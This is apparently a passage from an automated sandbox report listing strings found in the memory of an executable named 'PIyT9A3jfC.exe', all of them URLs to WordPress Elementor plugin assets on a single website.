                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.3
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src:u
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
